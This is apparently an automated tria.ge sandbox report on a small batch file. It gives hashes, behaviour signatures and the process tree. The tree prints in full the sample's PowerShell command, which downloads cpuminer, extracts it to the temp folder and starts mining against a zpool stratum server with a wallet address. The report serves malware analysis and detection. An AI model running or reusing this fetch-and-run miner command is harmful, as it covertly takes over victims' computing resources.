Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1796s -
max time network
1807s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
03/02/2024, 10:59
Static task
static1
Behavioral task
behavioral1
Sample
73u3Ito.bat
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
73u3Ito.bat
Resource
win10v2004-20231215-ja
General
-
Target
73u3Ito.bat
-
Size
499B
-
MD5
fe74bff27516829a88cfbc6f6e99646f
-
SHA1
0c15d859211c79910b277d07e729bec7197a60cd
-
SHA256
b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
-
SHA512
a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 8 928 powershell.exe 10 928 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 460 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 460 cpuminer-sse2.exe 460 cpuminer-sse2.exe 460 cpuminer-sse2.exe 460 cpuminer-sse2.exe 460 cpuminer-sse2.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 928 powershell.exe 928 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 928 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 776 wrote to memory of 928 776 cmd.exe 84 PID 776 wrote to memory of 928 776 cmd.exe 84 PID 928 wrote to memory of 2284 928 powershell.exe 92 PID 928 wrote to memory of 2284 928 powershell.exe 92 PID 2284 wrote to memory of 460 2284 cmd.exe 94 PID 2284 wrote to memory of 460 2284 cmd.exe 94
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:928 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 23⤵
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 24⤵
- Executes dropped EXE
- Loads dropped DLL
PID:460
-
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
653KB
MD54bb1835c03dcd5f2f5b99aa12d25abd7
SHA1adc70db53bcb7533f9cd8260ce42cdcffac2bf6f
SHA256bf68df49b17ac5f7ce086653a9434e4173ac3be7ba075612ff5533ed204d65f8
SHA5126275b78a44dd2aa789c22fb59c2e9ab24f6480347cc148dd667523aa20979d0c1cb2029952a2d818722d937ad5061dd7caf6f88d9fbbca99e717fc7d6b326681
-
Filesize
393KB
MD5cdfb179e77d0a8664ff62b6bcc3e9f07
SHA119ce0152b06fc9093cf933b667bb874d824aa04c
SHA2569076368f5e5a314fc098932e87699bb2fc93510c7668ee77032a67ea45e5ac7e
SHA51299007f66d5fa1629742e7e13f1181ad9b51fa953b832010578efa45dc8dde42835a2b24b1199e46dbf1c3f26f872578f8aea5ce475d6d8831a39d53904753c07
-
Filesize
434KB
MD58ea1502f824e457fc1e9868535d5d763
SHA1dc44dbe4ad07bef31ccca08eefa532c69870f624
SHA25682ac9252003d049cfef1fa8042fb1cf07e7050744b4a203980ceda44d942618f
SHA5121257b2857d908a952babab5302b4dab755d67bbc7d98e8f5db38ee0908f8bbbd9dda166c9fa12aa64c7f486f4a3083c96bbe0becc9d13fda9e3b23d72d3d1d52
-
Filesize
650KB
MD539ab448a6137ca1fb398aa3858999d60
SHA1ee670c0464622633a744ffd02f40768d773f57cf
SHA256fa646cdfc2b3c65e6010d45083c1bd2c589d2c7d14cd6294be498b7001f95a1d
SHA51242afd3503a3bf7612f79498d168d2a23107852c91937f450a54b899d860f94a82dc09872fc76b2b1e05af4b8a33800be4bf45533a5c3934b36a824c8d090ff65
-
Filesize
619KB
MD5ab267a62d9952d65719027ab91437121
SHA181adcff06a6b2dc36b7b1e1cc9a155177e613c89
SHA256d04bfbb6b7dd2c08a787458facdd1f7660678cf4100fe3639e2d4035da19c4b9
SHA512ea1b3dc6370ddebe36286e0bf160611620e1350e98faf3b6e0c511d9287b43a38141fcb621518f98caa41a684908334309156a50885779047ecf798681f0f38c
-
Filesize
423KB
MD5d879b953e6575c8651b9981f2b7dc6db
SHA1799b7c640e1cf881f6e1069271283f9ccc0a3dd6
SHA256ae91faca9fd3ec8763d6deff6715e14dc1f09e2ba046cba967937ceb5a65aff9
SHA5126a51e79dd51c7e39b00eb0ff9acee88e4295af7bc01001bc9803907271bf9eaaaf325752f72d5c6752cf6e08385a910ff1c10c3472799b2531dc2ebb6b963fa9
-
Filesize
369KB
MD5fede42f069b2ded6f51d300238b88baa
SHA1070918a46b32e10ccd9c0a38e0aac886f80e0b1f
SHA256dac89dfb7c5a095a47473401c0bb98f09170b1ad1792ce3ec47ca600c7bc54d8
SHA5121da0cfd7dd6bc73d6150886610adefb30a9eb67df775afa651b3ba0720fd90bece27bdba1943e5853e6103ba61f4d0954edce5d4042f58e0f47d63ed0d442237
-
Filesize
2.3MB
MD5ac231ebd81d9ab26cd62688483ed30a9
SHA1c5f0be2d212aee8de6d59d6304c0218ef1759495
SHA25600177d877a76bbcabc904a6e79ddf4715e33edfb13817e5e75fd8acf157d0171
SHA51242998e48139a3bdf791ce491af7eb1a83f15ea4e60ffcf057e13fe82caf6a6dde079a18842b770f14dbd1d36a5a024436cc1eb89d38039ede0029e41c9372a23
-
Filesize
1.3MB
MD5d587bf77b6b268f2ad77a7d514f9e3ff
SHA17a987a3bbba0989b66892ce48642dd5daf1de923
SHA2561a34d33fdf367ad63dd78974cd53a5ff6297dffebd2f046b2ab43f0962b6fe0e
SHA512849f427ec8b63396a8b5f2bbc7fc74f6c62bcc223e22bd6776fb576d98bd01a53a6d43ef948737e6f37ed9b7474aac1db1744efd4098d22cc7c31e368446be64
-
Filesize
466KB
MD5654dfab914df89ee3e3517851957afa2
SHA1c2197ec749869b52331da3cbf5aa362dad0b6b26
SHA25632526228b9acd3b66473fdb11543e3def370753de39f6640370ae9a5aeb101c4
SHA5122dbbbee9e582000f978b14f7b3584fea6603186c922fb0fc4c4cf0becf5e903902da074997383329e8316d12d8f0db8553e43926bd866c32702c0f6ab7b08e30
-
Filesize
591KB
MD591dcd837fa80d942084e7458ec38a423
SHA138dd38ec9d56cb9f39b51dfe5c6e4ca442af9db1
SHA2561ffecc3b591c17940bfc24b4a980347dc1055dd3ab7c17c8d8650aaea3f18ecc
SHA512b1aa1103103d74f3f4e37d0326cafb6e7054fa1da00053e58f81b254719cd44f3d3cd016b421704e06782c6c4576f36d7da6912c5fbad9481d1cff74e9761e6e